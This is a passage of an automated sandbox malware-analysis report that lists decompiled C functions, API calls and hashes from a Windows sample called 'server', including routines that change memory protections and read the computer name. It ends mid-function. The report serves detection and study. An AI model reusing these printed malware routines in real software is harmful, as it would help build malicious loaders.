              • Part of subcall function 047E6536: lstrlen.KERNEL32(?,00000000,05429E00,00000000,047E6F0A,0542A023,43175AC3,?,?,?,?,43175AC3,00000005,047EA00C,4D283A53,?), ref: 047E653D
              • Part of subcall function 047E6536: mbstowcs.NTDLL ref: 047E6566
              • Part of subcall function 047E6536: memset.NTDLL ref: 047E6578
            • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74655520,00000008,00000014,004F0053,05429270), ref: 047E518F
            • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74655520,00000008,00000014,004F0053,05429270), ref: 047E51BD
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
            • String ID: Uet
            • API String ID: 1500278894-2766386878
            • Opcode ID: 9ab8b67d634ed911c1a332a216aaa4feed70b1e122a6fd3d77c34e3722bbcb15
            • Instruction ID: d8022a2efec36dad9e9a49b343291ad9f1a186b46458d2852de406f7fb5c52fe
            • Opcode Fuzzy Hash: 9ab8b67d634ed911c1a332a216aaa4feed70b1e122a6fd3d77c34e3722bbcb15
            • Instruction Fuzzy Hash: C3018472200209BBDB215F96DC44EEA3F79EF88718F404626FA009A251EA72E954D750
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 87%
            			E004014CF(void* __eax, void* _a4) {
            				signed int _v8;
            				signed int _v12;
            				signed int _v16;
            				long _v20;
            				int _t42;
            				long _t53;
            				intOrPtr _t56;
            				void* _t57;
            				signed int _t59;
            
            				_v12 = _v12 & 0x00000000;
            				_t56 =  *0x404180;
            				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
            				_v16 =  *(__eax + 6) & 0x0000ffff;
            				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed
            				_v8 = _v8 & 0x00000000;
            				if(_v16 <= 0) {
            					L12:
            					return _v12;
            				} else {
            					goto L1;
            				}
            				while(1) {
            					L1:
            					_t59 = _v12;
            					if(_t59 != 0) {
            						goto L12;
            					}
            					asm("bt [esi+0x24], eax");
            					if(_t59 >= 0) {
            						asm("bt [esi+0x24], eax");
            						if(__eflags >= 0) {
            							L8:
            							_t53 = _t56 - 0x43175abf;
            							L9:
            							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed
            							if(_t42 == 0) {
            								_v12 = GetLastError();
            							}
            							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28;
            							_v8 = _v8 + 1;
            							if(_v8 < _v16) {
            								continue;
            							} else {
            								goto L12;
            							}
            						}
            						asm("bt [esi+0x24], eax");
            						_t53 = _t56 - 0x43175ac1;
            						if(__eflags >= 0) {
            							goto L9;
            						}
            						goto L8;
            					}
            					asm("bt [esi+0x24], eax");
            					if(_t59 >= 0) {
            						_t53 = _t56 - 0x43175aa3;
            					} else {
            						_t53 = _t56 - 0x43175a83;
            					}
            					goto L9;
            				}
            				goto L12;
            			}












            0x004014d9
            0x004014e6
            0x004014ec
            0x004014f8
            0x00401508
            0x0040150a
            0x00401512
            0x004015a6
            0x004015ad
            0x00000000
            0x00000000
            0x00000000
            0x00401518
            0x00401518
            0x00401518
            0x0040151c
            0x00000000
            0x00000000
            0x00401528
            0x0040152c
            0x00401550
            0x00401554
            0x00401568
            0x00401568
            0x0040156e
            0x0040157d
            0x00401581
            0x00401589
            0x00401589
            0x00401595
            0x00401597
            0x004015a0
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004015a0
            0x0040155c
            0x00401560
            0x00401566
            0x00000000
            0x00000000
            0x00000000
            0x00401566
            0x00401534
            0x00401538
            0x00401542
            0x0040153a
            0x0040153a
            0x0040153a
            0x00000000
            0x00401538
            0x00000000

            APIs
            • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
            • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
            • GetLastError.KERNEL32 ref: 00401583
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ProtectVirtual$ErrorLast
            • String ID:
            • API String ID: 1469625949-0
            • Opcode ID: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
            • Instruction ID: db8870d9979c58085381c8b0541bfb0d1fdb36fbc34c572f0fe0e58abbf4653c
            • Opcode Fuzzy Hash: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
            • Instruction Fuzzy Hash: D1212B7280121AEFCB14CF95C9819AAF7B4FF58305F04487AE413AB960E738AA55CF58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 47%
            			E047E12C6(char* _a4, char** _a8) {
            				char* _t7;
            				char* _t11;
            				char* _t14;
            				char* _t16;
            				char* _t17;
            				char _t18;
            				signed int _t20;
            				signed int _t22;
            
            				_t16 = _a4;
            				_push(0x20);
            				_t20 = 1;
            				_push(_t16);
            				while(1) {
            					_t7 = StrChrA();
            					if(_t7 == 0) {
            						break;
            					}
            					_t20 = _t20 + 1;
            					_push(0x20);
            					_push( &(_t7[1]));
            				}
            				_t11 = E047E33DC(_t20 << 2);
            				_a4 = _t11;
            				if(_t11 != 0) {
            					StrTrimA(_t16, 0x47e9278); // executed
            					_t22 = 0;
            					do {
            						_t14 = StrChrA(_t16, 0x20);
            						if(_t14 != 0) {
            							 *_t14 = 0;
            							do {
            								_t14 =  &(_t14[1]);
            								_t18 =  *_t14;
            							} while (_t18 == 0x20 || _t18 == 9);
            						}
            						_t17 = _a4;
            						 *(_t17 + _t22 * 4) = _t16;
            						_t22 = _t22 + 1;
            						_t16 = _t14;
            					} while (_t14 != 0);
            					 *_a8 = _t17;
            				}
            				return 0;
            			}











            0x047e12ca
            0x047e12d7
            0x047e12d9
            0x047e12da
            0x047e12e2
            0x047e12e2
            0x047e12e6
            0x00000000
            0x00000000
            0x047e12dd
            0x047e12de
            0x047e12e1
            0x047e12e1
            0x047e12ee
            0x047e12f3
            0x047e12f8
            0x047e1300
            0x047e1306
            0x047e1308
            0x047e130b
            0x047e130f
            0x047e1311
            0x047e1314
            0x047e1314
            0x047e1315
            0x047e1317
            0x047e1314
            0x047e1321
            0x047e1324
            0x047e1327
            0x047e1328
            0x047e132a
            0x047e1331
            0x047e1331
            0x047e133d

            APIs
            • StrChrA.SHLWAPI(?,00000020,00000000,054295FC,?,?,047E53AF,?,054295FC), ref: 047E12E2
            • StrTrimA.KERNELBASE(?,047E9278,00000002,?,047E53AF,?,054295FC), ref: 047E1300
            • StrChrA.SHLWAPI(?,00000020,?,047E53AF,?,054295FC), ref: 047E130B
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Trim
            • String ID:
            • API String ID: 3043112668-0
            • Opcode ID: 6a0793ee2812c1c2b85f3f0efaa6c9025c4916969e58486c0d7a750bb1a082bc
            • Instruction ID: 145e1d3c7e8d5e50dd57069c19f46823ab21e7fcd617c2af1e696c12df2e89ab
            • Opcode Fuzzy Hash: 6a0793ee2812c1c2b85f3f0efaa6c9025c4916969e58486c0d7a750bb1a082bc
            • Instruction Fuzzy Hash: 8701B1713003466FE7104E6BCC4AFB77B9CEB8D340F844211A995CB382D670E841C660
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E61DA(void* _a4) {
            				char _t2;
            
            				_t2 = RtlFreeHeap( *0x47ea2d8, 0, _a4); // executed
            				return _t2;
            			}




            0x047e61e6
            0x047e61ec

            APIs
            • RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID: Uet
            • API String ID: 3298025750-2766386878
            • Opcode ID: febcc0e3e7c6f760b694d6ee42c09d3e97d5e5f21bc8773ac0d43006a47c0b7d
            • Instruction ID: 61f2a1c1a679aac7940f9cf50ca50bb640fecd5a2092f4f8f7594771aa9fc942
            • Opcode Fuzzy Hash: febcc0e3e7c6f760b694d6ee42c09d3e97d5e5f21bc8773ac0d43006a47c0b7d
            • Instruction Fuzzy Hash: A2B012F3200200EBCB114B03DF04F457B21E7D8700F00C610B3041807182360C20FB15
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LocalAlloc.KERNELBASE(00000000,02B53FFC,0079A862,0040108C,?,00401014), ref: 00414876
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.523801722.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID: AllocLocal
            • String ID: t0@
            • API String ID: 3494564517-86208253
            • Opcode ID: a474110c101397cd18f60078a18c3dda39cdddade77e172d0c617e01277d085e
            • Instruction ID: be45306d5ca630943fb9e872924dde3a3a026e17281dafdd0bc2a0dc2c1a05f6
            • Opcode Fuzzy Hash: a474110c101397cd18f60078a18c3dda39cdddade77e172d0c617e01277d085e
            • Instruction Fuzzy Hash: 19A1A9717C4340BBF360ABA0DD47F9A77A4AB84B56F100426F7487E6D0C6B469848B6E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 75%
            			E047E790B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
            				void* _v8;
            				void* __esi;
            				intOrPtr* _t35;
            				void* _t40;
            				intOrPtr* _t41;
            				intOrPtr* _t43;
            				intOrPtr* _t45;
            				intOrPtr* _t50;
            				intOrPtr* _t52;
            				void* _t54;
            				intOrPtr* _t55;
            				intOrPtr* _t57;
            				intOrPtr* _t61;
            				intOrPtr* _t65;
            				intOrPtr _t68;
            				void* _t72;
            				void* _t75;
            				void* _t76;
            
            				_t55 = _a4;
            				_t35 =  *((intOrPtr*)(_t55 + 4));
            				_a4 = 0;
            				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
            				if(_t76 < 0) {
            					L18:
            					return _t76;
            				}
            				_t40 = E047E4358(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
            				_t76 = _t40;
            				if(_t76 >= 0) {
            					_t61 = _a28;
            					if(_t61 != 0 &&  *_t61 != 0) {
            						_t52 = _v8;
            						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
            					}
            					if(_t76 >= 0) {
            						_t43 =  *_t55;
            						_t68 =  *0x47ea348; // 0xc3d5a8
            						_t20 = _t68 + 0x47eb270; // 0x740053
            						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
            						if(_t76 >= 0) {
            							_t76 = E047E4984(_a4);
            							if(_t76 >= 0) {
            								_t65 = _a28;
            								if(_t65 != 0 &&  *_t65 == 0) {
            									_t50 = _a4;
            									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
            								}
            							}
            						}
            						_t45 = _a4;
            						if(_t45 != 0) {
            							 *((intOrPtr*)( *_t45 + 8))(_t45);
            						}
            						_t57 = __imp__#6;
            						if(_a20 != 0) {
            							 *_t57(_a20);
            						}
            						if(_a12 != 0) {
            							 *_t57(_a12);
            						}
            					}
            				}
            				_t41 = _v8;
            				 *((intOrPtr*)( *_t41 + 8))(_t41);
            				goto L18;
            			}





















            0x047e7911
            0x047e7914
            0x047e7924
            0x047e792d
            0x047e7931
            0x047e79ff
            0x047e7a05
            0x047e7a05
            0x047e794b
            0x047e7950
            0x047e7954
            0x047e795a
            0x047e795f
            0x047e7966
            0x047e7975
            0x047e7975
            0x047e7979
            0x047e797b
            0x047e7987
            0x047e7992
            0x047e799d
            0x047e79a1
            0x047e79ab
            0x047e79af
            0x047e79b1
            0x047e79b6
            0x047e79bd
            0x047e79cd
            0x047e79cd
            0x047e79b6
            0x047e79af
            0x047e79cf
            0x047e79d4
            0x047e79d9
            0x047e79d9
            0x047e79dc
            0x047e79e5
            0x047e79ea
            0x047e79ea
            0x047e79ef
            0x047e79f4
            0x047e79f4
            0x047e79ef
            0x047e7979
            0x047e79f6
            0x047e79fc
            0x00000000

            APIs
              • Part of subcall function 047E4358: SysAllocString.OLEAUT32(80000002), ref: 047E43B5
              • Part of subcall function 047E4358: SysFreeString.OLEAUT32(00000000), ref: 047E441B
            • SysFreeString.OLEAUT32(?), ref: 047E79EA
            • SysFreeString.OLEAUT32(047E4D42), ref: 047E79F4
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: String$Free$Alloc
            • String ID:
            • API String ID: 986138563-0
            • Opcode ID: 7bbfe4d37e87d4b901522a6d554104c75856c8b2426a9f78d78d7749d282afb2
            • Instruction ID: 7964a95ab0625b0cd45657d4ccac1132515a328f105919b6fee602536744511b
            • Opcode Fuzzy Hash: 7bbfe4d37e87d4b901522a6d554104c75856c8b2426a9f78d78d7749d282afb2
            • Instruction Fuzzy Hash: F4313972500159AFCF15DF5AC888CABBB7AFFCD7407144658F9059B214D731AD91CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0040139F() {
            				char _v16;
            				intOrPtr _v28;
            				void _v32;
            				void* _v36;
            				intOrPtr _t15;
            				void* _t16;
            				void* _t24;
            				long _t25;
            				int _t26;
            				void* _t30;
            				intOrPtr* _t32;
            				signed int _t35;
            				intOrPtr _t38;
            
            				_t15 =  *0x404184;
            				if( *0x40416c > 5) {
            					_t16 = _t15 + 0x40513c;
            				} else {
            					_t16 = _t15 + 0x40529c;
            				}
            				E00401D3C(_t16, _t16);
            				_t35 = 6;
            				memset( &_v32, 0, _t35 << 2);
            				_t24 = E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf); // executed
            				if(_t24 == 0) {
            					_t25 = 0xb;
            				} else {
            					_t26 = lstrlenW( *0x404178);
            					_t8 = _t26 + 2; // 0x2
            					_t11 = _t26 + _t8 + 8; // 0xa
            					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed
            					if(_t30 == 0) {
            						_t32 = _v36;
            						 *_t32 = 0;
            						if( *0x404178 == 0) {
            							 *((short*)(_t32 + 4)) = 0;
            						} else {
            							L00401FE6(_t32 + 4);
            						}
            					}
            					_t25 = E004012FB(_v28); // executed
            				}
            				ExitThread(_t25);
            			}
















            0x004013a5
            0x004013b6
            0x004013c0
            0x004013b8
            0x004013b8
            0x004013b8
            0x004013c7
            0x004013d0
            0x004013d5
            0x004013ec
            0x004013f3
            0x00401450
            0x004013f5
            0x004013fb
            0x00401401
            0x0040140f
            0x00401413
            0x0040141a
            0x00401422
            0x00401426
            0x0040142e
            0x0040143f
            0x00401430
            0x00401436
            0x00401436
            0x0040142e
            0x00401447
            0x00401447
            0x00401452

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ExitThreadlstrlen
            • String ID:
            • API String ID: 2636182767-0
            • Opcode ID: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
            • Instruction ID: 2b8b17c81bcefa181eed95ac27ced154ec6146dfe98fb58ff2424010aaaeeb75
            • Opcode Fuzzy Hash: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
            • Instruction Fuzzy Hash: A511E271504205ABE700EB61DD48E5B77ECAF84314F00493BB941F72B1EB38EA448B5A
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 047E32AB
              • Part of subcall function 047E790B: SysFreeString.OLEAUT32(?), ref: 047E79EA
            • SafeArrayDestroy.OLEAUT32(?), ref: 047E32FB
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: ArraySafe$CreateDestroyFreeString
            • String ID:
            • API String ID: 3098518882-0
            • Opcode ID: fa63b107f1f63d4bbd4b1e82b19e84521316c31260260d579fdd1d3cb6b438d8
            • Instruction ID: aedbc8482a35b6c8b199c00469b9a9645429733752634d14d528484f418c11dd
            • Opcode Fuzzy Hash: fa63b107f1f63d4bbd4b1e82b19e84521316c31260260d579fdd1d3cb6b438d8
            • Instruction Fuzzy Hash: 0F11337590010ABFDB11DF95CC05DEEBBB9EF08714F008115EA05A7260E775AA159B91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E33F1(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
            				void* _t21;
            				void* _t22;
            				signed int _t24;
            				intOrPtr* _t26;
            				void* _t27;
            
            				_t26 = __edi;
            				if(_a4 == 0) {
            					L2:
            					_t27 = E047E58BD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
            					if(_t27 == 0) {
            						_t24 = _a12 >> 1;
            						if(_t24 == 0) {
            							_t27 = 2;
            							HeapFree( *0x47ea2d8, 0, _a4);
            						} else {
            							_t21 = _a4;
            							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
            							 *_t26 = _t21;
            						}
            					}
            					L6:
            					return _t27;
            				}
            				_t22 = E047E2839(_a4, _a8, _a12, __edi); // executed
            				_t27 = _t22;
            				if(_t27 == 0) {
            					goto L6;
            				}
            				goto L2;
            			}








            0x047e33f1
            0x047e33f9
            0x047e3410
            0x047e342b
            0x047e342f
            0x047e3434
            0x047e3436
            0x047e3448
            0x047e3454
            0x047e3438
            0x047e3438
            0x047e343d
            0x047e3442
            0x047e3442
            0x047e3436
            0x047e345a
            0x047e345e
            0x047e345e
            0x047e3405
            0x047e340a
            0x047e340e
            0x00000000
            0x00000000
            0x00000000

            APIs
              • Part of subcall function 047E2839: SysFreeString.OLEAUT32(00000000), ref: 047E289C
            • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,746AF710,?,00000000,?,00000000,?,047E528E,?,004F0053,05429218,00000000,?), ref: 047E3454
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Free$HeapString
            • String ID: Uet
            • API String ID: 3806048269-2766386878
            • Opcode ID: b6b627693b891c682e60becbd07ed2a41b132c3c6b06c28d0930750b721e4773
            • Instruction ID: e41c5d218663a198f4307a27c844315e8d9b8ce590740d8c49292bced98ae406
            • Opcode Fuzzy Hash: b6b627693b891c682e60becbd07ed2a41b132c3c6b06c28d0930750b721e4773
            • Instruction Fuzzy Hash: CB012832500619BBDB239F96CC04EFA3BA9EF48750F048625FE099B220D731A961DBD0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 37%
            			E047E472F(void* __ecx) {
            				signed int _v8;
            				void* _t15;
            				void* _t19;
            				void* _t20;
            				void* _t22;
            				intOrPtr* _t23;
            
            				_t23 = __imp__;
            				_t20 = 0;
            				_v8 = _v8 & 0;
            				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
            				_t10 = _v8;
            				if(_v8 != 0) {
            					_t20 = E047E33DC(_t10 + 1);
            					if(_t20 != 0) {
            						_t15 =  *_t23(3, _t20,  &_v8); // executed
            						if(_t15 != 0) {
            							 *((char*)(_v8 + _t20)) = 0;
            						} else {
            							E047E61DA(_t20);
            							_t20 = 0;
            						}
            					}
            				}
            				return _t20;
            			}









            0x047e4734
            0x047e473f
            0x047e4741
            0x047e4747
            0x047e4749
            0x047e474e
            0x047e4757
            0x047e475b
            0x047e4764
            0x047e4768
            0x047e4777
            0x047e476a
            0x047e476b
            0x047e4770
            0x047e4770
            0x047e4768
            0x047e475b
            0x047e4780

            APIs
            • GetComputerNameExA.KERNELBASE(00000003,00000000,047E3DCD,00000000,00000000,?,76B5C740,047E3DCD), ref: 047E4747
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • GetComputerNameExA.KERNELBASE(00000003,00000000,047E3DCD,047E3DCE,?,76B5C740,047E3DCD), ref: 047E4764
              • Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: ComputerHeapName$AllocateFree
            • String ID:
            • API String ID: 187446995-0
            • Opcode ID: 89a0f5632de3de12c16161154fd31385e5ac103552a1ba55b0edeead8f33e715
            • Instruction ID: 6a5bb549ac550136d10efb955a9c1f384f3bcf066ef5922da2cdd214a2d8e8f8
            • Opcode Fuzzy Hash: 89a0f5632de3de12c16161154fd31385e5ac103552a1ba55b0edeead8f33e715
            • Instruction Fuzzy Hash: F7F0B47660011AFAEB11D6ABCC08EBF3BACEBC9645F500155E904D3240EA70EE0186B0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E5006(signed int __edx, intOrPtr _a4) {
            				void* _t3;
            				void* _t5;
            				void* _t7;
            				void* _t8;
            				void* _t9;
            				signed int _t10;
            
            				_t10 = __edx;
            				_t3 = HeapCreate(0, 0x400000, 0); // executed
            				 *0x47ea2d8 = _t3;
            				if(_t3 == 0) {
            					_t8 = 8;
            					return _t8;
            				}
            				 *0x47ea1c8 = GetTickCount();
            				_t5 = E047E54D8(_a4);
            				if(_t5 == 0) {
            					_t5 = E047E213E(_t9, _a4); // executed
            					if(_t5 == 0) {
            						if(E047E6392(_t9) != 0) {
            							 *0x47ea300 = 1; // executed
            						}
            						_t7 = E047E2523(_t10); // executed
            						return _t7;
            					}
            				}
            				return _t5;
            			}









            0x047e5006
            0x047e500f
            0x047e5015
            0x047e501c
            0x047e5020
            0x00000000
            0x047e5020
            0x047e502d
            0x047e5032
            0x047e5039
            0x047e503f
            0x047e5046
            0x047e504f
            0x047e5051
            0x047e5051
            0x047e505b
            0x00000000
            0x047e505b
            0x047e5046
            0x047e5060

            APIs
            • HeapCreate.KERNELBASE(00000000,00400000,00000000,047E107E,?), ref: 047E500F
            • GetTickCount.KERNEL32 ref: 047E5023
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: CountCreateHeapTick
            • String ID:
            • API String ID: 2177101570-0
            • Opcode ID: 0b27fa557c322b04812bb7f5700adce201c12989a7a1708c035b05f28b84cdd6
            • Instruction ID: c7f112157844f9da14a987702e0e15b8e69bff38abb9e5d505e65b3bd1700451
            • Opcode Fuzzy Hash: 0b27fa557c322b04812bb7f5700adce201c12989a7a1708c035b05f28b84cdd6
            • Instruction Fuzzy Hash: 29F06D7174430AFAEB612FB3A91877537A4AB4C70CF508B25F901D8382EBB5F8009A61
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RtlAllocateHeap.NTDLL(00000008,?), ref: 00411AE5
            Memory Dump Source
            • Source File: 00000000.00000002.523801722.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: ffc422ddd39041b05de87dbb1cc33fb912c3cbe10e636ac8d1964e38e8d4c3fb
            • Instruction ID: 8f1e6770ac83704bff406797ba9c9fc97c9d0a6c2db46855d965d7ba77dce368
            • Opcode Fuzzy Hash: ffc422ddd39041b05de87dbb1cc33fb912c3cbe10e636ac8d1964e38e8d4c3fb
            • Instruction Fuzzy Hash: 0D01B1353062159BEB249F65DC04BA73798AF917A0F05452AEE158B2B0E77CAC80C698
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 34%
            			E047E2839(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
            				intOrPtr _v12;
            				void* _v18;
            				char _v20;
            				intOrPtr _t15;
            				void* _t17;
            				intOrPtr _t19;
            				void* _t23;
            
